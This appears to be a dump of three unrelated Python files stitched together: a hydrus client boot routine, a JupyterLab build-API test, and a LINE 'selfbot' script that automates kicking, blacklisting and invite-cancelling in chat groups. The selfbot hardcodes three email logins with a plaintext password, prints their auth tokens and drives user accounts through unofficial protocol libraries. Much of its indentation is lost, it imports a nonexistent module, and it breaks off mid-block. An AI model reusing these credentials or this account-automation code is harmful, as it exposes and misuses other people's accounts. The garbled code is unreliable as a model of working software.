dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )
sys.exit( 1 )
def boot():
    """Run the hydrus client until shutdown.

    Relies on module globals set by the bootstrap block above (`result`,
    `db_dir`, `reactor`, the HG flags).  Blocks in controller.Run() and
    performs the full shutdown sequence in the finally clause.
    """
    if result.temp_dir is not None:
        HydrusTemp.SetEnvTempDir( result.temp_dir )
    controller = None
    with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
        try:
            HydrusData.Print( 'hydrus client started' )
            if not HG.twisted_is_broke:
                import threading
                # installSignalHandlers=0: the reactor runs on a worker
                # thread, so it must not try to install signal handlers.
                threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
            from hydrus.client import ClientController
            controller = ClientController.Controller( db_dir )
            controller.Run()
        except:
            HydrusData.Print( 'hydrus client failed' )
            import traceback
            HydrusData.Print( traceback.format_exc() )
        finally:
            # Flag every subsystem to shut down, wake sleeping daemons, and
            # stop the twisted reactor from its own thread.
            HG.started_shutdown = True
            HG.view_shutdown = True
            HG.model_shutdown = True
            if controller is not None:
                controller.pubimmediate( 'wake_daemons' )
            if not HG.twisted_is_broke:
                reactor.callFromThread( reactor.stop )
            HydrusData.Print( 'hydrus client shut down' )
            HG.shutdown_complete = True
            if HG.restart:
                HydrusData.RestartProcess()
|
test_build_api.py | """Test the kernels service API."""
import threading
import time

from ipython_genutils.tempdir import TemporaryDirectory
from ipython_genutils import py3compat
from jupyterlab.labapp import LabApp
from jupyterlab_launcher.tests.utils import APITester, LabTestBase
from notebook.tests.launchnotebook import assert_http_error
class BuildAPITester(APITester):
    """Wrapper for build REST API requests"""
    # Endpoint, relative to the lab server root.
    url = 'lab/api/build'
    def getStatus(self):
        """GET the current build status."""
        return self._req('GET', '')
    def build(self):
        """POST to trigger a build."""
        return self._req('POST', '')
    def clear(self):
        """DELETE to cancel a running build."""
        return self._req('DELETE', '')
class BuildAPITest(LabTestBase):
    """Test the build web service API"""
    Application = LabApp

    def tempdir(self):
        """Create a TemporaryDirectory that is cleaned up after the test run."""
        td = TemporaryDirectory()
        self.tempdirs.append(td)
        return py3compat.cast_unicode(td.name)

    def setUp(self):
        # Any TemporaryDirectory objects appended to this list will be cleaned
        # up at the end of the test run.
        self.tempdirs = []

        @self.addCleanup
        def cleanup_tempdirs():
            for d in self.tempdirs:
                d.cleanup()

        self.build_api = BuildAPITester(self.request)

    def test_get_status(self):
        """Make sure there are no kernels running at the start"""
        resp = self.build_api.getStatus().json()
        assert 'status' in resp
        assert 'message' in resp

    def test_build(self):
        resp = self.build_api.build()
        assert resp.status_code == 200

    def test_clear(self):
        """Clearing an in-progress build should abort it and return 204."""
        with assert_http_error(500):
            self.build_api.clear()

        def build_thread():
            with assert_http_error(500):
                self.build_api.build()

        t1 = threading.Thread(target=build_thread)
        t1.start()

        # Poll until the build actually starts, with a deadline and a small
        # backoff so a broken server fails the test instead of hanging the
        # suite forever.  (The original spun in a bare `while 1:` loop.)
        deadline = time.monotonic() + 30
        while True:
            resp = self.build_api.getStatus().json()
            if resp['status'] == 'building':
                break
            if time.monotonic() > deadline:
                raise AssertionError('build never reached the building state')
            time.sleep(0.1)

        resp = self.build_api.clear()
        assert resp.status_code == 204
|
mobZpro.py | '''
┏━━━━━━━━━━━━━━━━━
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍].
┗━━━━━━━━━━━━━━━━━
'''
from linepy import *
from liff.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest
from thrift import transport, protocol, server
from akad.ttypes import *
from akad.ttypes import Message
from akad.ttypes import ContentType as Type
from akad.ttypes import TalkException
from akad.ttypes import IdentityProvider, LoginResultType, LoginRequest, LoginType
from akad.ttypes import ChatRoomAnnouncementContents
from akad.ttypes import Location
from akad.ttypes import ChatRoomAnnouncement
from multiprocessing import Pool, Process
from thrift.Thrift import *
from thrift.unverting import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift import transport, protocol, server
from thrift.protocol import TCompactProtocol, TMultiplexedProtocol, TProtocol
from thrift.transport import TTransport, TSocket, THttpClient, TZlibTransport
from time import sleep
import pytz, datetime, time, timeit, livejson,asyncio, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, traceback, tempfile, platform
from humanfriendly import format_timespan, format_size, format_number, format_length
from datetime import timedelta, date
from datetime import datetime
from threading import Thread, activeCount
# 𐀀[x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍] _______________________________________________________
_session = requests.session()
try:
import urllib.request as urllib2
except ImportError:
import urllib2
programStart = time.time()
a001 = LINE('rvrndis@gmail.com','36091vwz')
print('》》》》UNIT 001 READY《《《《')
a002 = LINE('slynq1@gmail.com','36091vwz')
print('》》》》UNIT 002 READY《《《《')
a003 = LINE('slynq2@gmail.com','36091vwz')
print('》》》》UNIT 003 READY《《《《\n')
a001.log("[ M001D23 ]\n" + str(a001.authToken))
a002.log("[ M002D23 ]\n" + str(a002.authToken))
a003.log("[ M003D23 ]\n" + str(a003.authToken))
print('\n━━━━━━━━━━━━━━━━━━━━━━━━━━━')
print('\n██████╗░██████╗░███████╗██╗\n██╔══██╗██╔══██╗██╔════╝██║\n██║░░██║██████╔╝█████╗░░██║\n██║░░██║██╔══██╗██╔══╝░░╚═╝\n██████╔╝██║░░██║███████╗██╗\n╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝')
print('\n》》》》PROGRAM STARTED《《《《\n')
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
M001D23 = a001.getProfile().mid
M002D23 = a002.getProfile().mid
M003D23 = a003.getProfile().mid
army = [a001,a002]
antijs = [a003]
oepoll = OEPoll(a001)
call = a001
loop = asyncio.get_event_loop()
status = livejson.File('status.json', True, False, 4)
with open("settings.json","r",encoding="utf-8") as fp:
settings = json.load(fp)
creator = status["creator"]
owner = status["owner"]
admin = status["admin"]
staff = status["staff"]
mybots = status["mybots"]
blacklist = status["blacklist"]
promax = status["promax"]
strictmode = status["strictmode"]
Bots = [M001D23,M002D23,M003D23]
Botslist = [a001,a002,a003]
resp1 = a001.getProfile().displayName
resp2 = a002.getProfile().displayName
resp3 = a003.getProfile().displayName
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
helpCmd = '''
┣━━━━ 𐀀
┣ Protection
┣ Group
┣ Access
┣ Option
┣ Settings
┣ Reboot/Shutdown
┣━━━━ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
proCmd = '''
┣━━━━ Protection
┣ Kick/Invite [ Mention ]
┣ Protect [ Max/None ]
┣ Strictmode [ On/Off ]
┣ Protectlist
┣ Checkbot
┣ Purge
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
groupCmd = '''
┣━━━━ Group
┣ Ginfo
┣ Join
┣ Leave/Leave 1-3
┣ Invto [ Num ]
┣ Grouplist 1-3
┣ Mention/Tagall
┣ Memberlist/Pendinglist
┣ Openqr/Closeqr
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
accessCmd = '''
┣━━━━ Access
┣ Blacklist/Banlist
┣ Clearban
┣ Abort/Eject
┣ Squad List
┣ View Bots/Access
┣ Add/Del Owner [ Mention ]
┣ Add/Del Admin [ Mention ]
┣ Add/Del Staff [ Mention ]
┣ Add/Del Squad [ Mention ]
┣ Add/Del Ban [ Mention ]
┣ Owner:Recruit/Expel
┣ Admin:Recruit/Expel
┣ Staff:Recruit/Expel
┣ Squad:Add/Del
┣ Ban:Add/Del
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
optCmd ='''
┣━━━━ Option
┣ Allowliff
┣ Creator
┣ Respon/Ping
┣ Speed/Debug
┣ Me/About
┣ Mid/Mid [ Mention ]
┣ Contact [ Mention ]
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
setCmd = '''
┣━━━━ Settings
┣ Changepict:1-3/All
┣ Changebio:1-3/All [ Bio ]
┣ Changename:1-3/All [ Name ]
┣ 𐀀 [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]'''
aboutCmd ='''┏━━━━━━━━━━━┓ ▕ [x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]
┃▏╰━╮┏┈┓╭━╯▕┃ ▕ Protect Bot
┃▏═━┈┫𐀀┣┈━═▕┃ ▕ v5.4.4
┃▏╭━╯┗┈┛╰━╮▕┃ ▕
┗━━━━━━━━━━━┛ ▕ '''
dreX53 = '''██████╗░██████╗░███████╗██╗
██╔══██╗██╔══██╗██╔════╝██║
██║░░██║██████╔╝█████╗░░██║
██║░░██║██╔══██╗██╔══╝░░╚═╝
██████╔╝██║░░██║███████╗██╗
╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝'''
#[x!as 𝗌𝖾𝗅𝖿𝖻𝗈𝗍]. _______________________________________________________
for hlth in Botslist:
for xdrex in Bots:
try:
hlth.findAndAddContactsByMid(xdrex)
except:
pass
def backupData():
    """Write the in-memory `settings` dict to settings.json.

    Returns True on success and False on failure.  Bug fixes: the original
    opened the file with codecs.open but never closed it (handle leak), and
    its bare `except: pass` fell off the end returning None instead of False.
    """
    try:
        with codecs.open('settings.json', 'w', 'utf-8') as f:
            json.dump(settings, f, sort_keys=True, indent=4, ensure_ascii=False)
        return True
    except Exception:
        return False
def restartProgram():
    """Persist settings, then replace this process with a fresh interpreter."""
    print('\n》》》》PROGRAM RESTARTED《《《《\n')
    backupData()
    interpreter = sys.executable
    # os.execl never returns: the current process image is replaced in place.
    os.execl(interpreter, interpreter, *sys.argv)
def runtime(secs):
    """Format a duration in seconds, e.g. "01 Hours 05 Minutes 09 Seconds".

    Zero-valued units are omitted and months are approximated as 4 weeks.
    Returns "00 Seconds" for secs == 0 — the original indexed text[0] on an
    empty string there and raised IndexError.
    """
    mins, secs = divmod(secs, 60)
    hours, mins = divmod(mins, 60)
    days, hours = divmod(hours, 24)
    weeks, days = divmod(days, 7)
    months, weeks = divmod(weeks, 4)
    parts = []
    for amount, unit in ((months, "Months"), (weeks, "Weeks"), (days, "Days"),
                         (hours, "Hours"), (mins, "Minutes"), (secs, "Seconds")):
        if amount != 0:
            parts.append("%02d %s" % (amount, unit))
    return " ".join(parts) if parts else "00 Seconds"
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logError(text):
    """Log *text* via the primary account and append a timestamped line
    to ``logError.txt``.

    Timestamps use the Asia/Jakarta timezone with Indonesian day and month
    names.  Fixes two defects in the original: the month branch compared the
    zero-padded '%m' value against ``str(k)`` (never equal, so the month name
    was never substituted), and the local name ``time`` shadowed the module.
    """
    a001.log("[ ERROR ] {}".format(str(text)))
    tz = pytz.timezone("Asia/Jakarta")
    now = datetime.now(tz=tz)
    day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
    hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
    bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
    # translate the English weekday name to Indonesian by parallel index
    hasil = hari[day.index(now.strftime('%A'))]
    # '%m' is '01'..'12'; index directly into the month-name table
    bln = bulan[int(now.strftime('%m')) - 1]
    stamp = "{}, {} - {} - {} | {}".format(
        hasil, now.strftime('%d'), bln, now.strftime('%Y'), now.strftime('%H:%M:%S'))
    with open("logError.txt", "a") as error:
        error.write("\n[ {} ] {}".format(stamp, text))
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendMention(to, text="", mids=None):
    """Send a message to *to* that @-mentions every mid in *mids*.

    If *text* contains "@!" placeholders there must be exactly one per mid;
    each placeholder becomes a mention.  Otherwise one mention is prepended
    to *text*.  Raises Exception when *mids* is empty or None.

    NOTE: the original used the mutable default ``mids=[]``; ``None`` is the
    safe sentinel and keeps the call signature backward compatible.
    """
    if mids is None:
        mids = []
    if mids == []:
        raise Exception("Invalid mids")
    arr = []
    mention = "@dreMention"  # 11 chars; the S/E offsets below assume it
    if "@!" in text:
        if text.count("@!") != len(mids):
            raise Exception("Invalid mids")
        texts = text.split("@!")
        textx = ""
        for mid in mids:
            # caveat (kept from original): duplicate mids all resolve to the
            # first index via mids.index(mid)
            textx += str(texts[mids.index(mid)])
            slen = len(textx)
            elen = len(textx) + 15
            arr.append({'S': str(slen), 'E': str(elen - 4), 'M': mid})
            textx += mention
        textx += str(texts[len(mids)])
    else:
        textx = ""
        slen = len(textx)
        elen = len(textx) + 15
        arr.append({'S': str(slen), 'E': str(elen - 4), 'M': mids[0]})
        textx += mention + str(text)
    a001.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendTemplate(group, data):
    """Share *data* to *group* via the LIFF v3 share endpoint.

    NOTE(review): this definition is immediately shadowed by the
    ``sendTemplate(to, data)`` defined directly below, so it never runs.
    It also bound the LIFF view result to ``token1`` but read ``token``,
    which would raise NameError — fixed here.
    """
    xyz = LiffChatContext(group)
    xyzz = LiffContext(chat=xyz)
    view = LiffViewRequest('1602687308-GXq4Vvk9', xyzz)
    token = a001.liff.issueLiffView(view)
    url = 'https://api.line.me/message/v3/share'
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer %s' % token.accessToken
    }
    payload = {"messages": [data]}
    requests.post(url, headers=headers, data=json.dumps(payload))
def sendTemplate(to, data):
    """Share *data* as a single message to *to* through the LIFF share API."""
    chat_context = LiffContext(chat=LiffChatContext(to))
    token = a001.liff.issueLiffView(
        LiffViewRequest('1602687308-GXq4Vvk9', chat_context))
    payload = json.dumps({"messages": [data]})
    requests.post(
        'https://api.line.me/message/v3/share',
        headers={
            'Content-Type': 'application/json',
            'Authorization': 'Bearer %s' % token.accessToken
        },
        data=payload)
def allowLiff():
    """Grant the bot's LIFF channel the P and CM permissions."""
    permissions = {
        'on': [
            'P',
            'CM'
        ],
        'off': []
    }
    auth_headers = {
        'X-Line-Access': a001.authToken,
        'X-Line-Application': a001.server.APP_NAME,
        'X-Line-ChannelId': '1602687308',
        'Content-Type': 'application/json'
    }
    requests.post('https://access.line.me/dialog/api/permissions',
                  json=permissions, headers=auth_headers)
def sendFooter(receiver, text):
    """Send *text* decorated with the configured sentBy footer
    (label / icon URL / link URL taken from ``settings``)."""
    footer = {
        "label": "{}".format(settings["label"]),
        "iconUrl": "{}".format(settings["iconUrl"]),
        "linkUrl": "{}".format(settings["linkUrl"])
    }
    sendTemplate(receiver, {"type": "text", "text": text, "sentBy": footer})
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def kick(group, target):
    """Kick *target* from *group* with a001, falling back to a002.

    The API returns None on success; any non-None result is treated as a
    failure.  The original triggered the fallback by referencing the
    undefined name ``hlthfail`` (a NameError hack) — replaced with an
    explicit raise.
    """
    try:
        if a001.kickoutFromGroup(group, [target]) is not None:
            raise RuntimeError('a001 kick failed')
    except Exception:
        try:
            if a002.kickoutFromGroup(group, [target]) is not None:
                raise RuntimeError('a002 kick failed')
        except Exception:
            pass
def cancel(group, target):
    """Cancel *target*'s pending invitation to *group*, a001 then a002.

    Non-None API result means failure; the original forced the fallback by
    referencing the undefined name ``hlthfail`` — replaced with an explicit
    raise.
    """
    try:
        if a001.cancelGroupInvitation(group, [target]) is not None:
            raise RuntimeError('a001 cancel failed')
    except Exception:
        try:
            if a002.cancelGroupInvitation(group, [target]) is not None:
                raise RuntimeError('a002 cancel failed')
        except Exception:
            pass
def invite(group, target):
    """Add *target* as a contact and invite it to *group*, a001 then a002.

    Non-None API result means failure; the original forced the fallback by
    referencing the undefined name ``hlthfail`` — replaced with an explicit
    raise.
    """
    try:
        a001.findAndAddContactsByMid(target)
        if a001.inviteIntoGroup(group, [target]) is not None:
            raise RuntimeError('a001 invite failed')
    except Exception:
        try:
            a002.findAndAddContactsByMid(target)
            if a002.inviteIntoGroup(group, [target]) is not None:
                raise RuntimeError('a002 invite failed')
        except Exception:
            pass
def lockqr(group):
    """Close QR/ticket joins for *group* (preventedJoinByTicket = True).

    Tries a001 first, then a002.  Non-None result from updateGroup means
    failure; the original forced the fallback by referencing the undefined
    name ``hlthfail`` — replaced with an explicit raise.
    """
    try:
        G = a001.getGroup(group)
        G.preventedJoinByTicket = True
        if a001.updateGroup(G) is not None:
            raise RuntimeError('a001 updateGroup failed')
    except Exception:
        try:
            G = a002.getGroup(group)
            G.preventedJoinByTicket = True
            if a002.updateGroup(G) is not None:
                raise RuntimeError('a002 updateGroup failed')
        except Exception:
            pass
def join(group):
    """Accept a pending group invitation with a001, falling back to a002;
    failures on both accounts are swallowed."""
    for account in (a001, a002):
        try:
            account.acceptGroupInvitation(group)
            break
        except:
            continue
def reject(group):
    """Reject a pending group invitation with a001, falling back to a002;
    failures on both accounts are swallowed."""
    for account in (a001, a002):
        try:
            account.rejectGroupInvitation(group)
            break
        except:
            continue
def backup(group, target):
    """Re-seat a removed main bot: invite *target* back into *group* and,
    when the target is the other main account's mid, have that account
    accept the invitation immediately.

    a001 invites first; if *target* is a002's mid (M002D23) a002 accepts.
    On any failure the roles are mirrored: a002 invites and, if *target*
    is a001's mid (M001D23), a001 accepts.  Remaining failures are ignored.
    """
    try:
        a001.inviteIntoGroup(group, [target])
        if target == M002D23:
            a002.acceptGroupInvitation(group)
    except:
        try:
            a002.inviteIntoGroup(group, [target])
            if target == M001D23:
                a001.acceptGroupInvitation(group)
        except:
            pass
def antijs(group, target):
    """Recovery routine: the third account joins, kicks *target*, re-invites
    the two main bots, waits for them to accept, then leaves.

    NOTE: the first two calls run outside the try block, so if a003 cannot
    accept the invitation or kick, the exception propagates to the caller.
    """
    a003.acceptGroupInvitation(group)
    a003.kickoutFromGroup(group, [target])
    try:
        # re-invite both main bots, let them accept, then a003 withdraws
        a003.inviteIntoGroup(group, [M001D23,M002D23])
        a001.acceptGroupInvitation(group)
        a002.acceptGroupInvitation(group)
        # give the accepts a moment to land before a003 leaves
        time.sleep(3)
        a003.leaveGroup(group)
    except:
        pass
def blacklist(target):
    """Append *target* to status["blacklist"] unless it is a trusted mid
    (creator/owner/admin/staff/squad/bot) or already listed; any lookup
    failure is swallowed."""
    try:
        trusted = (target in creator or target in owner or target in admin
                   or target in staff or target in mybots or target in Bots)
        if not trusted and target not in status["blacklist"]:
            status["blacklist"].append(target)
    except:
        pass
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logspeed():
    """Measure one a001.getProfile() round trip and return a report string.

    NOTE: the original contained identical measurement sections for a002 and
    a003 after the first ``return`` — unreachable dead code, removed here.
    Callers invoke logspeed() once per account, but every call measured a001.
    """
    start = time.time()
    a001.getProfile()
    get_profile_time = time.time() - start
    get_profile_took = time.time() - start
    # label says "ms" but the value is in seconds — kept for message
    # compatibility with the original output
    return "[ Bots Speed ]\n- Took: %.3fms\n- Taken: %.5f" % (get_profile_took, get_profile_time)
def debug():
    """Time a001's getProfile / getGroupIdsJoined / getContact calls and
    return a formatted timing report.

    NOTE: the original contained identical sections for a002 and a003 after
    the first ``return`` — unreachable dead code, removed here.
    """
    profile_start = time.time()
    profile = a001.getProfile()
    get_profile_time = time.time() - profile_start
    group_start = time.time()
    a001.getGroupIdsJoined()
    get_group_time = time.time() - group_start
    contact_start = time.time()
    a001.getContact(profile.mid)
    get_contact_time = time.time() - contact_start
    # total elapsed time across all three calls, measured from the first
    elapsed_time = time.time() - profile_start
    return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time, get_profile_time, get_contact_time, get_group_time)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def command(text):
    """Lowercase *text* and strip the configured command-key prefix.

    Returns the bare command, or 'Undefined command' when a key is required
    but missing.  Fix: the original used ``str.replace`` which removed
    EVERY occurrence of the key inside the text, not just the leading one;
    a prefix slice removes only the prefix.
    """
    lowered = text.lower()
    if settings['setKey']['status']:
        if lowered.startswith(settings['setKey']['key']):
            cmd = lowered[len(settings['setKey']['key']):]
        else:
            cmd = 'Undefined command'
    else:
        cmd = lowered
    return cmd
def removeCmd(text, key=''):
    """Strip the command-key prefix and the first word from *text*,
    returning the argument portion (empty string when there is none).

    When *key* is '' the configured key from ``settings`` is used.
    """
    if key == '':
        prefix = '' if not settings['setKey']['status'] else settings['setKey']['key']
    else:
        prefix = key
    remainder = text[len(prefix):]
    # everything after the first space; '' when there is no space at all
    return remainder.partition(' ')[2]
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
async def mobanzu(op):
try:
if settings["restartPoint"] is not None:
a001.sendMessage(settings["restartPoint"],"[ Bots Operated Again... ]")
settings["restartPoint"] = None
if op.type == 0:
# print ("[ 0 ] END OF OPERATION")
return
if op.type == 11 or op.type == 122:
if op.type == 11: print ("[ 11 ] NOTIFIED UPDATE GROUP")
else: print ("[ 122 ] NOTIFIED UPDATE CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck1 = threading.Thread(target=lockqr, args=(op.param1,)).start()
fck2 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_1 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_2 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_3 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_4 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_6 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '4':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_8 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupqr = a001.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_9 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_10 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
groupqr = a002.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_11 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_12 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '1':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_13 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupn = a001.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a001.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a001.updateGroup(progn)
d23X_14 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a001.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a001.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a001.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a001.updateGroupPicture(progp)
d23X_15 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a001.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
try:
groupn = a002.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a002.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a002.updateGroup(progn)
d23X_16 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a002.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a002.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a002.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"]
a002.updateGroupPicture(progp)
d23X_17 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a002.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
if op.type == 13 or op.type == 124:
if op.type == 13: print ("[ 13 ] NOTIFIED INVITE INTO GROUP")
else: print ("[ 124 ] NOTIFIED INVITE INTO CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck3 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
fck4 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_18 = threading.Thread(target=blacklist, args=(op.param2,)).start()
d23X_19 = threading.Thread(target=blacklist, args=(op.param3,)).start()
try:
d23X_20 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_21 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_22 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_23 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_24 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_25 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_26 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_27 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_28 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_29 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_30 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_31 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_32 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_33 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_34 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_35 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_36 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_37 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M001D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_38 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_39 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if M002D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_40 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_41 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if op.type == 17 or op.type == 130:
if op.type == 17: print ("[ 17 ] NOTIFIED ACCEPT GROUP INVITATION")
else: print ("[ 130 ] NOTIFIED ACCEPT CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
